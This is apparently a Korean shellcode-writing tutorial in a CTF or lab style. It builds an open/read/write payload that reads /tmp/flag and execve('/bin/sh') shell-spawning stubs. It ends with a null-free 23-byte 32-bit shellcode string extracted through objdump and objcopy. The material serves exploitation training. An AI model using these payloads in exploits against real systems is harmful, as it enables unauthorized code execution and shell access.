Shellcode 만들기
1. Open, Read, Write
Skeleton Code |
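// File name: sh-skeleton.c
// Compile Option: gcc -o sh-skeleton sh-skeleton.c -masm=intel
//
// Harness for running hand-written x86-64 shellcode: whatever you place
// between the run_sh label and the exit stub is executed when main() calls
// run_sh(). Intel syntax (-masm=intel); Linux syscall ABI: rax = syscall
// number, args in rdi, rsi, rdx, r10, r8, r9, result in rax, rcx/r11
// clobbered by `syscall`.
__asm__(
    ".global run_sh\n"
    "run_sh:\n"
    // Insert your shellcode here, one instruction per string literal, each
    // terminated by '\n'. (The original placeholder text was not valid
    // assembly, so the skeleton did not build until it was replaced.)
    // Keep the exit stub below so a payload that falls through terminates
    // cleanly instead of executing whatever bytes follow run_sh.
    "xor rdi, rdi\n"        // rdi = 0 -> exit status
    "mov rax, 0x3c\n"       // rax = SYS_exit
    "syscall\n"             // exit(0)
);

void run_sh(void);

int main(void) {
    run_sh();
    return 0;
}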
orw.c (open,read,write 작성 예시) |
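// File name: orw.c
// Compile: gcc -o orw orw.c -masm=intel
//
// open/read/write example: open("/tmp/flag", O_RDONLY), read up to 0x30
// bytes into a stack buffer, write exactly what was read to stdout, exit(0).
// Intel syntax; Linux x86-64 syscall ABI (rax = number, args rdi/rsi/rdx,
// result in rax, negative rax = -errno, rcx/r11 clobbered by `syscall`).
__asm__(
    ".global run_sh\n"
    "run_sh:\n"
    // Build "/tmp/flag\0" on the stack: `push imm8` sign-extends 'g' into a
    // full 8-byte slot ("g\0\0\0\0\0\0\0"), then "/tmp/fla" goes below it.
    "push 0x67\n"
    "mov rax, 0x616c662f706d742f\n"   // "/tmp/fla" (little-endian)
    "push rax\n"
    "mov rdi, rsp\n"                  // rdi = "/tmp/flag"
    "xor rsi, rsi\n"                  // rsi = O_RDONLY (0)
    "xor rdx, rdx\n"                  // rdx = 0 (mode; unused without O_CREAT)
    "mov rax, 2\n"                    // rax = SYS_open
    "syscall\n"                       // rax = open("/tmp/flag", O_RDONLY, 0)
    "test rax, rax\n"
    "js .Ldone\n"                     // open failed (rax = -errno): don't read from a bogus fd
    //
    // read(fd, buf, 0x30): buf sits in the red zone below rsp, which a leaf
    // function may use without adjusting rsp; the kernel does not touch it.
    "mov rdi, rax\n"                  // rdi = fd
    "mov rsi, rsp\n"
    "sub rsi, 0x30\n"                 // rsi = rsp - 0x30 -> buf
    "mov rdx, 0x30\n"                 // rdx = sizeof(buf)
    "xor rax, rax\n"                  // rax = SYS_read
    "syscall\n"                       // rax = read(fd, buf, 0x30)
    "test rax, rax\n"
    "jle .Ldone\n"                    // error or EOF: nothing to write
    //
    // write(1, buf, n): n is read()'s return value, NOT the buffer size.
    // Writing a fixed 0x30 bytes would also dump whatever uninitialised
    // stack bytes follow the file contents.
    "mov rdx, rax\n"                  // rdx = bytes actually read
    "mov rdi, 1\n"                    // rdi = STDOUT_FILENO
    "mov rax, 1\n"                    // rax = SYS_write
    "syscall\n"                       // write(1, buf, n)  (rsi still = buf)
    ".Ldone:\n"
    "xor rdi, rdi\n"                  // rdi = 0 -> exit status
    "mov rax, 0x3c\n"                 // rax = SYS_exit
    "syscall\n"                       // exit(0)
);

void run_sh(void);

int main(void) {
    run_sh();
    return 0;
}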
// 테스트 파일 생성 (예: 아래 출력과 맞추려면 "flagggg" 를 넣는다)
$ echo flagggg > /tmp/flag
// 실행 — write 길이를 read 의 반환값이 아니라 고정 0x30 으로 두면 파일 내용 뒤에 스택에 남아 있던 값까지 같이 출력될 수 있으므로, 출력 길이는 read 결과로 맞춰야 한다
# ./orw
flagggg
----------------------------------
2. execve("/bin/sh", null, null)
Skeleton Code |
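; Name: execve.S
; execve("/bin/sh", NULL, NULL) stub for x86-64 Linux, Intel syntax with
; NASM-style `;` comments (note: GAS treats `;` as a statement separator on
; x86, so assemble this with nasm or strip the comments for a .S file).
; "/bin/sh" is 7 bytes, so the 64-bit immediate has a zero high byte and the
; push leaves a NUL-terminated string at [rsp].
; Linux tolerates argv = envp = NULL; POSIX does not promise it, so pass a
; real argv when the payload must be portable.
        mov     rax, 0x68732f6e69622f   ; "/bin/sh\0"
        push    rax
        mov     rdi, rsp                ; rdi = "/bin/sh"
        xor     rsi, rsi                ; rsi = argv = NULL
        xor     rdx, rdx                ; rdx = envp = NULL
        mov     rax, 0x3b               ; rax = SYS_execve
        syscall                         ; execve("/bin/sh", NULL, NULL)
        ; Reached only if execve failed (rax = -errno). Exit instead of
        ; falling through into whatever bytes follow the payload.
        xor     rdi, rdi                ; rdi = 0 -> exit status
        mov     rax, 0x3c               ; rax = SYS_exit
        syscall                         ; exit(0)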
셸코드 예제 |
// File name: execve.c
// Compile Option: gcc -o execve execve.c -masm=intel
//
// Spawns /bin/sh via execve("/bin/sh", NULL, NULL) from hand-written
// x86-64 assembly (Intel syntax, Linux syscall ABI). If execve fails the
// stub falls into exit(0) rather than running off the end of run_sh.
// NULL argv/envp is accepted by Linux; do not rely on it elsewhere.
__asm__(
    ".global run_sh\n"
    "run_sh:\n"
    "mov rax, 0x68732f6e69622f\n"   // "/bin/sh" is 7 chars -> high byte 0 = NUL
    "push rax\n"                    // [rsp] = "/bin/sh\0"
    "mov rdi, rsp\n"                // pathname
    "xor esi, esi\n"                // argv = NULL (32-bit xor zero-extends rsi)
    "xor edx, edx\n"                // envp = NULL
    "mov eax, 0x3b\n"               // SYS_execve
    "syscall\n"                     // execve("/bin/sh", NULL, NULL)
    // Only reached when execve returned an error in rax.
    "xor edi, edi\n"                // exit status 0
    "mov eax, 0x3c\n"               // SYS_exit
    "syscall\n"                     // exit(0)
);

void run_sh(void);

int main(void) {
    run_sh();
    return 0;
}
bash$ gcc -o execve execve.c -masm=intel
bash$ ./execve
sh$ id
uid=1000(dreamhack) gid=1000(dreamhack) groups=1000(dreamhack)
----------------------------------
3. shellcode 추출
1) asm 코드 생성
shellcode.asm |
; File name: shellcode.asm
; 32-bit (i386) execve("/bin//sh", NULL, NULL) via int 0x80, NASM syntax.
; Assemble with `nasm -f elf shellcode.asm`. No instruction below encodes a
; 0x00 byte: that is why the path is padded to 8 chars ("/bin//sh") and why
; the syscall number is written through al rather than eax.
; NOTE(review): int 0x80 is the 32-bit ABI; on an x86-64 kernel it only works
; when IA32 emulation is enabled -- confirm on the target.
section .text
global _start
_start:
    xor eax, eax            ; eax = 0
    push eax                ; NUL terminator for the path string
    push 0x68732f2f         ; "//sh"
    push 0x6e69622f         ; "/bin"  -> [esp] = "/bin//sh\0"
    mov ebx, esp            ; ebx = pathname
    xor ecx, ecx            ; ecx = argv = NULL
    xor edx, edx            ; edx = envp = NULL
    mov al, 0xb             ; eax = 11 = SYS_execve (upper bytes already 0)
    int 0x80                ; execve("/bin//sh", NULL, NULL)
2) 어셈블 후 objdump 로 디스어셈블하여 각 명령의 기계어 바이트 확인
$ sudo apt-get install nasm
$ nasm -f elf shellcode.asm
$ objdump -d shellcode.o
shellcode.o: file format elf32-i386
Disassembly of section .text:
00000000 <_start>:
0: 31 c0 xor %eax,%eax
2: 50 push %eax
3: 68 2f 2f 73 68 push $0x68732f2f
8: 68 2f 62 69 6e push $0x6e69622f
d: 89 e3 mov %esp,%ebx
f: 31 c9 xor %ecx,%ecx
11: 31 d2 xor %edx,%edx
13: b0 0b mov $0xb,%al
15: cd 80 int $0x80
3) .text 섹션만 바이너리로 추출하여 바이트 열 확인
$ objcopy --dump-section .text=shellcode.bin shellcode.o
$ xxd shellcode.bin
00000000: 31c0 5068 2f2f 7368 682f 6269 6e89 e331 1.Ph//shh/bin..1
00000010: c931 d2b0 0bcd 80 .1.....
4) 추출한 바이트를 C 문자열 형태로 정리
# execve /bin/sh shellcode (23 bytes, 0x00 바이트 없음, 32-bit int 0x80 ABI):
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"